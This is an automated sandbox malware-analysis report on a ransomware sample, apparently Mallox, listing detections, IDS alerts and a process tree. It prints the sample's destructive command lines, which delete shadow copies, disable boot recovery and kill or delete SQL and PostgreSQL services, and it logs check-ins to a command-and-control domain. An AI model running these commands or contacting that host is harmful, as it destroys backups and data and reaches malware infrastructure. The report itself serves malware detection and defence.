Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
malware.exe

Overview

General Information

Sample name:malware.exe
(renamed file extension from none to exe)
Original sample name:malware
Analysis ID:1570605
MD5:99bfaaacebf1b34fdebd4e7ce4070a36
SHA1:2e4080a5a71ad5030b9cab6e1465a5777ea57cf2
SHA256:c0e35b19f97021416e3724006511afc95d6aa409404e812d8c62b955bc917d3c
Infos:

Detection

Targeted Ransomware, TrojanRansom
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found ransom note / readme
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected RansomwareGeneric
Yara detected Targeted Ransomware
Yara detected TrojanRansom
AI detected suspicious sample
Creates files in the recycle bin to hide itself
Deletes shadow drive data (may be related to ransomware)
Machine Learning detection for sample
May disable shadow drive data (uses vssadmin)
Opens network shares
Sigma detected: Shadow Copies Deletion Using Operating Systems Utilities
Sigma detected: Suspicious Epmap Connection
Uses bcdedit to modify the Windows boot settings
Writes a notice file (html or txt) to demand a ransom
Writes many files with high entropy
Abnormal high CPU Usage
Checks for available system drives (often done to infect USB drives)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Stores files to the Windows start menu directory
Uses 32bit PE files
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • malware.exe (PID: 6904 cmdline: "C:\Users\user\Desktop\malware.exe" MD5: 99BFAAACEBF1B34FDEBD4E7CE4070A36)
    • cmd.exe (PID: 4544 cmdline: "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • vssadmin.exe (PID: 6256 cmdline: "C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quiet MD5: B58073DB8892B67A672906C9358020EC)
      • conhost.exe (PID: 648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6280 cmdline: "C:\Windows\System32\cmd.exe" /C sc delete "MSSQLFDLauncher"&&sc delete "MSSQLSERVER"&&sc delete "SQLSERVERAGENT"&&sc delete "SQLBrowser"&&sc delete "SQLTELEMETRY"&&sc delete "MsDtsServer130"&&sc delete "SSISTELEMETRY130"&&sc delete "SQLWriter"&&sc delete "MSSQL$VEEAMSQL2012"&&sc delete "SQLAgent$VEEAMSQL2012"&&sc delete "MSSQL"&&sc delete "SQLAgent"&&sc delete "MSSQLServerADHelper100"&&sc delete "MSSQLServerOLAPService"&&sc delete "MsDtsServer100"&&sc delete "ReportServer"&&sc delete "SQLTELEMETRY$HL"&&sc delete "TMBMServer"&&sc delete "MSSQL$PROGID"&&sc delete "MSSQL$WOLTERSKLUWER"&&sc delete "SQLAgent$PROGID"&&sc delete "SQLAgent$WOLTERSKLUWER"&&sc delete "MSSQLFDLauncher$OPTIMA"&&sc delete "MSSQL$OPTIMA"&&sc delete "SQLAgent$OPTIMA"&&sc delete "ReportServer$OPTIMA"&&sc delete "msftesql$SQLEXPRESS"&&sc delete "postgresql-x64-9.4"&&rem Kill "SQL"&&taskkill -f -im sqlbrowser.exe&&taskkill -f -im sqlwriter.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im msmdsrv.exe&&taskkill -f -im MsDtsSrvr.exe&&taskkill -f -im sqlceip.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im Ssms.exe&&taskkill -f -im SQLAGENT.EXE&&taskkill -f -im fdhost.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im ReportingServicesService.exe&&taskkill -f -im msftesql.exe&&taskkill -f -im pg_ctl.exe&&taskkill -f -im postgres.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 2056 cmdline: sc delete "MSSQLFDLauncher" MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
    • cmd.exe (PID: 4600 cmdline: "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • notepad.exe (PID: 4456 cmdline: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FILE RECOVERY.txt MD5: 27F71B12CB585541885A31BE22F61C83)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: malware.exe PID: 6904JoeSecurity_Ransomware_GenericYara detected Ransomware_GenericJoe Security
    Process Memory Space: malware.exe PID: 6904JoeSecurity_TargetedRansomwareYara detected Targeted RansomwareJoe Security
      Process Memory Space: malware.exe PID: 6904JoeSecurity_TrojanRansomYara detected TrojanRansomJoe Security

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: Shadow Copies Deletion Using Operating Systems Utilities
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades): Data: Command: "C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quiet, CommandLine: "C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quiet, CommandLine|base64offset|contains: u^, Image: C:\Windows\System32\vssadmin.exe, NewProcessName: C:\Windows\System32\vssadmin.exe, OriginalFileName: C:\Windows\System32\vssadmin.exe, ParentCommandLine: "C:\Users\user\Desktop\malware.exe", ParentImage: C:\Users\user\Desktop\malware.exe, ParentProcessId: 6904, ParentProcessName: malware.exe, ProcessCommandLine: "C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quiet, ProcessId: 6256, ProcessName: vssadmin.exe
        Sigma detected: Suspicious Epmap Connection
        Source: Network ConnectionAuthor: frack113, Tim Shelton (fps): Data: DestinationIp: 192.168.2.1, DestinationIsIpv6: false, DestinationPort: 135, EventID: 3, Image: C:\Users\user\Desktop\malware.exe, Initiated: true, ProcessId: 6904, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49737

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-07T12:40:59.562832+010020468261A Network Trojan was detected192.168.2.4555791.1.1.153UDP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-07T12:41:01.288018+010020468271A Network Trojan was detected192.168.2.44973313.248.169.48443TCP
        2024-12-07T12:41:03.154741+010020468271A Network Trojan was detected192.168.2.44973413.248.169.48443TCP
        2024-12-07T12:41:05.039651+010020468271A Network Trojan was detected192.168.2.44973813.248.169.48443TCP
        2024-12-07T12:41:07.058485+010020468271A Network Trojan was detected192.168.2.44973913.248.169.48443TCP
        2024-12-07T12:41:12.534758+010020468271A Network Trojan was detected192.168.2.44974013.248.169.48443TCP
        2024-12-07T12:41:14.330007+010020468271A Network Trojan was detected192.168.2.44974213.248.169.48443TCP
        2024-12-07T12:41:16.128235+010020468271A Network Trojan was detected192.168.2.44974413.248.169.48443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-07T12:41:01.724541+010020398151A Network Trojan was detected192.168.2.44973313.248.169.48443TCP
        2024-12-07T12:41:03.633622+010020398151A Network Trojan was detected192.168.2.44973413.248.169.48443TCP
        2024-12-07T12:41:05.586290+010020398151A Network Trojan was detected192.168.2.44973813.248.169.48443TCP
        2024-12-07T12:41:07.506995+010020398151A Network Trojan was detected192.168.2.44973913.248.169.48443TCP
        2024-12-07T12:41:12.977306+010020398151A Network Trojan was detected192.168.2.44974013.248.169.48443TCP
        2024-12-07T12:41:14.771895+010020398151A Network Trojan was detected192.168.2.44974213.248.169.48443TCP
        2024-12-07T12:41:16.568045+010020398151A Network Trojan was detected192.168.2.44974413.248.169.48443TCP

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus / Scanner detection for submitted sample
        Source: malware.exeAvira: detected
        Multi AV Scanner detection for domain / URL
        Source: whyers.ioVirustotal: Detection: 16%Perma Link
        Source: https://whyers.io/QWEwqdsvsf/ap.phpsVirustotal: Detection: 16%Perma Link
        Multi AV Scanner detection for submitted file
        Source: malware.exeReversingLabs: Detection: 100%
        Source: malware.exeVirustotal: Detection: 82%Perma Link
        AI detected suspicious sample
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.3% probability
        Machine Learning detection for sample
        Source: malware.exeJoe Sandbox ML: detected
        Source: malware.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 13.248.169.48:443 -> 192.168.2.4:49733 version: TLS 1.2
        Source: malware.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: Binary string: \\.\C:\Documents and Settings\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: malware.exe, 00000000.00000003.2482024738.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2500906615.0000000004D49000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2502598406.0000000004D49000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2479874614.0000000004D49000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2508320820.0000000004D49000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Documents and Settings\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb.maloxmalox source: malware.exe, 00000000.00000003.2519245558.0000000004B2C000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2522348895.0000000004B2C000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2496475119.0000000004B2C000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2508586862.0000000004B2C000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2511621429.0000000004B2C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Documents and Settings\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.maloxl\ source: malware.exe, 00000000.00000003.2517916860.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2524145663.0000000000DE6000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2503400133.0000000000DC0000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2502212669.0000000000DE6000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2520951632.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2500262981.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Documents and Settings\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\FILE RECOVERY.txt1 source: malware.exe, 00000000.00000003.2482024738.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2479874614.0000000004D49000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: 696334923056ntkrnlmp.pdbDD2-7850-423A-B1D8-7882CE1A6D15.logGN source: malware.exe, 00000000.00000003.2478408892.0000000004AB1000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \\.\C:\Documents and Settings\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.malox source: malware.exe, 00000000.00000003.2517916860.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2524145663.0000000000DE6000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2503400133.0000000000DC0000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2502212669.0000000000DE6000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2520951632.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2500262981.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: malware.exe, 00000000.00000003.2479874614.0000000004D49000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2175625545.0000000004AB1000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Documents and Settings\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error.malox source: malware.exe, 00000000.00000003.2517916860.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2524145663.0000000000DE6000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2503400133.0000000000DC0000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2502212669.0000000000DE6000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2520951632.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2500262981.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: prcr.pdb source: prcr.x3d.0.dr
        Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\* source: malware.exe, 00000000.00000003.2191393645.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2189324109.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2185245833.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \\.\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\FILE RECOVERY.txtRY.txt-86F4-D3CB9162C2DEY.txttERY.txttxt.png-white.pngECOVERY.txtgY.txt.png source: malware.exe, 00000000.00000003.2186244420.0000000004A95000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\* source: malware.exe, 00000000.00000003.2268404890.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2208687986.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2287116859.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2223481419.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2200950278.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2245352369.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2224953867.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2241504225.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2215040679.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2243528894.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2289764990.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2228211754.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2175625545.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2250270754.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2185841452.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2238187504.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2216671107.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2247025349.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2195742049.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2269307894.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2206887797.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2191702343.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2261663956.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2254145279.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2176553456.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2281002480.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2203036218.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2265326633.0000000004AC9000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2242475973.0000000004AC9000.00000004.00000020.00020000.00000000.sdm
        Source: Binary string: \??\C:\Documents and Settings\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.maloxlox source: malware.exe, 00000000.00000003.2517916860.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2524145663.0000000000DE6000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2503400133.0000000000DC0000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2502212669.0000000000DE6000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2520951632.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2500262981.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\FILE RECOVERY.txt source: malware.exe, 00000000.00000003.2185527738.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2217917248.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2198750453.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2221909202.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2225220813.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2196899481.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \\.\C:\Documents and Settings\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\FILE RECOVERY.txta\FILE RECOVERY.txtA93746D24D97499F6005AF34C7906F717D420F892FD6D0txttxt source: malware.exe, 00000000.00000003.2486383254.0000000004A93000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \\.\C:\Documents and Settings\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb.malox source: malware.exe, 00000000.00000003.2519245558.0000000004B2C000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2496475119.0000000004B2C000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2508586862.0000000004B2C000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2511621429.0000000004B2C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mi_exe_stub.pdb source: wct3D66.tmp.0.dr
        Source: Binary string: \??\C:\Documents and Settings\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb.malox source: malware.exe, 00000000.00000003.2517916860.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2524145663.0000000000DE6000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2503400133.0000000000DC0000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2502212669.0000000000DE6000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2520951632.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp, malware.exe, 00000000.00000003.2500262981.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: #ntkrnlmp.pdb source: malware.exe, 00000000.00000003.2479874614.0000000004D49000.00000004.00000020.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\malware.exeFile opened: z:Jump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile opened: x:Jump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile opened: v:Jump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile opened: t:Jump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile opened: r:Jump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile opened: p:Jump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile opened: n:Jump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile opened: l:Jump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile opened: j:Jump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile opened: h:Jump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile opened: f:Jump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile opened: b:Jump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile opened: y:Jump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile opened: w:Jump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile opened: u:Jump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile opened: s:Jump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile opened: q:Jump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile opened: o:Jump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile opened: m:Jump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile opened: k:Jump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile opened: i:Jump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile opened: g:Jump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile opened: e:Jump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile opened: c:Jump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile opened: a:Jump to behavior
        Source: C:\Users\user\Desktop\malware.exeDirectory queried: number of queries: 1001
        Source: C:\Users\user\Desktop\malware.exeFile opened: C:\ProgramData\Microsoft OneDriveJump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile opened: C:\ProgramData\Microsoft OneDrive\setup\refcount.iniJump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile opened: C:\ProgramData\Microsoft OneDrive\setup\NULLJump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile opened: C:\ProgramData\Microsoft OneDrive\NULLJump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile opened: C:\ProgramData\Microsoft OneDrive\setupJump to behavior
        Source: C:\Users\user\Desktop\malware.exeFile opened: C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38Jump to behavior

        Networking

        barindex
        Suricata IDS alerts for network traffic
        Source: Network trafficSuricata IDS: 2046826 - Severity 1 - ET MALWARE Mallox Ransomware CnC Domain (whyers .io) in DNS Lookup : 192.168.2.4:55579 -> 1.1.1.1:53
        Source: Network trafficSuricata IDS: 2046827 - Severity 1 - ET MALWARE Observed Mallox Ransomware Domain (whyers .io) in TLS SNI : 192.168.2.4:49744 -> 13.248.169.48:443
        Source: Network trafficSuricata IDS: 2046827 - Severity 1 - ET MALWARE Observed Mallox Ransomware Domain (whyers .io) in TLS SNI : 192.168.2.4:49734 -> 13.248.169.48:443
        Source: Network trafficSuricata IDS: 2046827 - Severity 1 - ET MALWARE Observed Mallox Ransomware Domain (whyers .io) in TLS SNI : 192.168.2.4:49742 -> 13.248.169.48:443
        Source: Network trafficSuricata IDS: 2046827 - Severity 1 - ET MALWARE Observed Mallox Ransomware Domain (whyers .io) in TLS SNI : 192.168.2.4:49733 -> 13.248.169.48:443
        Source: Network trafficSuricata IDS: 2046827 - Severity 1 - ET MALWARE Observed Mallox Ransomware Domain (whyers .io) in TLS SNI : 192.168.2.4:49740 -> 13.248.169.48:443
        Source: Network trafficSuricata IDS: 2046827 - Severity 1 - ET MALWARE Observed Mallox Ransomware Domain (whyers .io) in TLS SNI : 192.168.2.4:49738 -> 13.248.169.48:443
        Source: Network trafficSuricata IDS: 2046827 - Severity 1 - ET MALWARE Observed Mallox Ransomware Domain (whyers .io) in TLS SNI : 192.168.2.4:49739 -> 13.248.169.48:443
        Source: Network trafficSuricata IDS: 2039815 - Severity 1 - ET MALWARE Win32/Filecoder.OJC CnC Checkin : 192.168.2.4:49734 -> 13.248.169.48:443
        Source: Network trafficSuricata IDS: 2039815 - Severity 1 - ET MALWARE Win32/Filecoder.OJC CnC Checkin : 192.168.2.4:49744 -> 13.248.169.48:443
        Source: Network trafficSuricata IDS: 2039815 - Severity 1 - ET MALWARE Win32/Filecoder.OJC CnC Checkin : 192.168.2.4:49740 -> 13.248.169.48:443
        Source: Network trafficSuricata IDS: 2039815 - Severity 1 - ET MALWARE Win32/Filecoder.OJC CnC Checkin : 192.168.2.4:49738 -> 13.248.169.48:443
        Source: Network trafficSuricata IDS: 2039815 - Severity 1 - ET MALWARE Win32/Filecoder.OJC CnC Checkin : 192.168.2.4:49733 -> 13.248.169.48:443
        Source: Network trafficSuricata IDS: 2039815 - Severity 1 - ET MALWARE Win32/Filecoder.OJC CnC Checkin : 192.168.2.4:49739 -> 13.248.169.48:443
        Source: Network trafficSuricata IDS: 2039815 - Severity 1 - ET MALWARE Win32/Filecoder.OJC CnC Checkin : 192.168.2.4:49742 -> 13.248.169.48:443
        Source: global trafficHTTP traffic detected: POST /QWEwqdsvsf/ap.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: whyers.ioContent-Length: 163Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: POST /QWEwqdsvsf/ap.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: whyers.ioContent-Length: 163Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: POST /QWEwqdsvsf/ap.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: whyers.ioContent-Length: 163Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: POST /QWEwqdsvsf/ap.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: whyers.ioContent-Length: 163Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: POST /QWEwqdsvsf/ap.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: whyers.ioContent-Length: 163Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: POST /QWEwqdsvsf/ap.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: whyers.ioContent-Length: 163Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: POST /QWEwqdsvsf/ap.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: whyers.ioContent-Length: 163Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.ipify.orgConnection: Keep-AliveCache-Control: no-cache
        Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
        Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
        Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
        Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: unknownDNS query: name: api.ipify.org
        Source: unknownDNS query: name: api.ipify.org
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: C:\Users\user\Desktop\malware.exeFile created: C:\Documents and Settings\Default\Local Settings\Temporary Internet Files\FILE RECOVERY.txtJump to behavior
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.ipify.orgConnection: Keep-AliveCache-Control: no-cache
        Source: global trafficDNS traffic detected: DNS query: api.ipify.org
        Source: global trafficDNS traffic detected: DNS query: whyers.io
        Source: unknownHTTP traffic detected: POST /QWEwqdsvsf/ap.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: whyers.ioContent-Length: 163Cache-Control: no-cache
